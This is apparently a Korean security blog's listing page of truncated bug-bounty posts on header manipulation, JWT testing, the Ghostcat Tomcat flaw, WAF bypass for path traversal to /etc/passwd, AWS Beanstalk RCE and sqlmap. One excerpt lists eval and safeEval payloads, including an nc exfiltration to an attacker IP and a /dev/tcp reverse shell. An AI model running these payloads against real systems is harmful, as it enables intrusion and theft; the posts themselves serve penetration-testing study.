패킷 헤더 조작
2025. 2. 11. 10:57
WEB/버그바운티 써먹기
버그바운티에서 은근 보이는 header 들 정리 ForwardedForwarded 헤더는 기존의 X-Forwarded-For, X-Forwarded-Proto, X-Forwarded-Host 같은 비표준 헤더들을 대체하기 위해 만들어진 표준화된 헤더. > 사용방법Forwarded: by=; for=; host=; proto=* for = X-Forwarded-For를 대체host = X-Forwarded-Host를 대체proto = X-Forwarded-Proto를 대체 > 사용 예curl -v -H "Forwarded: host=test.com" https://www.naver.com출처 : https://hackerone.com/reports/2627221 해당 명령어 결과가 test.com으로 리..

[도구사용법] jwt_tool
2024. 1. 2. 18:57
WEB/버그바운티 써먹기
진단시 jwt가 심심치 않게 나와서 매번 귀찮게 수동으로 테스트 하기 싫어서 툴을 하나만드려고 했는데 이미 잘 만들어진 툴이 있었다. 이것도 알아야 써먹을 수 있으니까 자세히 분석해보자 https://github.com/ticarpi/jwt_tool GitHub - ticarpi/jwt_tool: :snake: A toolkit for testing, tweaking and cracking JSON Web Tokens :snake: A toolkit for testing, tweaking and cracking JSON Web Tokens - GitHub - ticarpi/jwt_tool: :snake: A toolkit for testing, tweaking and cracking JSON Web To..

[Tomcat] AJP 프로토콜 취약점을 이용하여 파일 읽기
2023. 6. 14. 14:41
WEB/버그바운티 써먹기
Ghostcat(CVE-2020-1938) 이라고 불리는 Tomcat AJP 프로토콜 취약점이다. 에러 메시지 설정을 하지 않아 WAS 정보가 노출되었을 때 취약한 버전의 tomcat을 사용하고 있다면 시도해 보자 취약한 버전 버그바운티 할 때는 그렇고 모의 침투 때는 포트 스캔을 통해 먼저 알아볼 수 있다. AJP의 디폴트 포트는 8009이다. 취약점 설명 취약점에 대한 설명은 아래 url에 아주 자세하게 설명되어 있으니 한번 읽는 것을 추천 https://www.igloo.co.kr/security-information/tomcat-ajp-%EC%B7%A8%EC%95%BD%EC%A0%90-%EB%B6%84%EC%84%9D-%EB%B0%8F-%EB%8C%80%EC%9D%91%EB%B0%A9%EC%95%..
방화벽 우회 방법
2023. 6. 12. 16:51
WEB/버그바운티 써먹기
- HTTP/2로 우회 GET /donwload?url=../../../../../etc/passwd HTTP/1.1 # 실패 GET /donwload?url=../../../../../etc/passwd HTTP/2 # 성공 * 다운로드 뿐만 아니라 업로드 등 다른 기법에도 사용 가능 - 필터링 되는 다른 문자열등으로 우회 ## script 라는 문자열이 삭제되는 필터링 시 GET /donwload?url=../../../../../etc/passwd HTTP/1.1 # 실패 GET /donwload?url=..script/..script/..script/..script/..script/etc/passwd HTTP/1.1 # 성공
[AWS] Elastic Beanstalk(eb) RCE
2023. 2. 3. 09:54
WEB/공부
aws elastic beanstalk란? AWS Elastic Beanstalk? Java, .NET, PHP, Node.js, Python, Ruby 및 Go와 같은 다양한 환경용으로 개발된 웹 애플리케이션을 배포하고 확장하기 위해 AWS에서 제공하는 PaaS(Platform as a Service)입니다. elasric beastalk는 간단하게 웹 어플리케이션을 배포하고 싶을 때 쓰는 서비스이다. 코드를 업로드하기만 하면 EC2, s3 나 방화벽, 로드밸런싱등 귀찮은 것은 알아서 다 처리해 주는 편리한 서비스이다. 취약점 발생 이유 평균적으로 SSRF등의 취약점을 통해 클라우드의 AccessKeyId, SecretAccessKey, Session_token을 획득한 후 사용자 ID를 탈취하여도 S..
[도구 사용법] sqlmap
2023. 2. 2. 10:58
WEB/공부
사용법 : python sqlmap.py [options] 옵션 -h, --help 기본 도움말 메시지 표시 및 종료 -hh 고급 도움말 메시지 표시 및 종료 --version 프로그램 버전 번호 표시 및 종료 -v VERBOSE 상세 수준 : 0-6 (기본값 1) 대상 : 대상(복수 가능)을 정의하려면 이러한 옵션 중 하나 이상을 제공해야 함. -u URL, --url=URL 대상 URL (e.g. "hxxp://www.koromoon.com/vuln.php?id=1") -d DIRECT 직접 데이터베이스 연결을 위한 연결 문자열 -l LOGFILE Burp 또는 WebScarab 프록시 로그 파일에서 대상(다수 포함) 구문 분석 -m BULKFILE 텍스트 파일에서 제공된 여러 대상 스캔 -r REQ..

[개발] .js 파일안에 하드코딩 되어있는 문자열 검색 tool
2023. 2. 1. 17:55
WEB/버그바운티 써먹기
개발언어 : Python 3.9.7 모의해킹 및 취약점 진단을 하다가 .js 파일 안에 패스워드가 하드코딩 되어있는 경우를 몇몇 보았다. 하지만 빈도 수는 적어서 .js 파일을 하나하나 다 보기가 시간이 아까워 해당 tool을 만들게 되었다. 해당 단어가 존재하는진 알지만 뭔진 몰라서 어차피 수동으로 보긴 해야 함 반자동,,, 아니 반반자동..ㅎㅎ 사용방법 python hardC_in_js.py -h 스크립트 실행 시 py가 존재하는 폴더에 hardC_in_js.txt 생성 * --url : 확인하고 싶은 url * --word : 하드코딩 되어있는 단어 검색 (여러개 설정 가능) 사용 예시 python hardC_in_js.py --url [URL] --word [WORD] * 여러개 단어 검색할 땐 ..
Eval & Safe-Eval poc 모음
2023. 1. 3. 19:31
WEB/공부
eval (__import__('os').system('id|nc 공격자IP주소:포트')) require('fs').readdirSync('.').toString() require('child_process').exec('touch hack.txt) fs.readFileSync('cat /etc/passwd') root.process.mainModule.require(‘child_process’).spawnSync(‘cat’, [‘/etc/passwd’]).stdout Safe-Eval safeEval("this.constructor.constructor('return child_process')().exec('bash -i >& /dev/tcp/$ip/$port 0>&1')"); safeEval("th..

XSS in Less (Feat. kibana)
2022. 12. 16. 23:07
WEB/버그바운티 써먹기
Less 란? LESS는 CSS Preprocessor(전처리기)로서 CSS를 변수나 Nested Rules을 이용하여 쉽고 빠르고 체계적으로 프로그래밍할 수 있게 만든 것을 말한다. CSS 프리프로세서에는 LESS, SASS/SCSS, COMPASS 등이 있으며 그중에 LESS의 문법을 따라 프로그래밍한 것을 LESS라고 한다. LESS는 CSS의 확장버전으로 하위 호환성이 뛰어나며 CSS의 기존 문법을 그대로 사용하기 때문에 익히기 쉽다는 장점이 있다. 한마디로 css를 프로그래밍 하기 위해 만들어진 언어라는 것이다. 웹에서 css 대신 쓰이기도 한다. XSS 유발 과정 https://hackerone.com/reports/858874 Elastic disclosed on HackerOne: Stor..

Python Flask 취약함수 모음
2022. 12. 12. 23:45
WEB/공부
1. send_from_directory 야기될 수 있는 취약점 자격 증명 유출 : 공격자가 자격 증명이 저장된 구성 파일에 액세스 할 수 있습니다. 소스 코드 다운로드 : 공격자는 전체 웹 사이트의 코드를 다운로드하여 추가 손상으로 이어질 수 있습니다. 원격 코드 실행 poc 예시 Alquist에서의 Path traversal vulnerability ( CVE-2021-43492 ) 2. send_file 야기 될수 있는 취약점 자격 증명 유출 : 공격자가 자격 증명이 저장된 구성 파일에 액세스 할 수 있습니다. 소스 코드 다운로드 : 공격자는 전체 웹 사이트의 코드를 다운로드하여 추가 손상으로 이어질 수 있습니다. 원격 코드 실행 poc 예시 clinical-genomics/scout에서의 Path..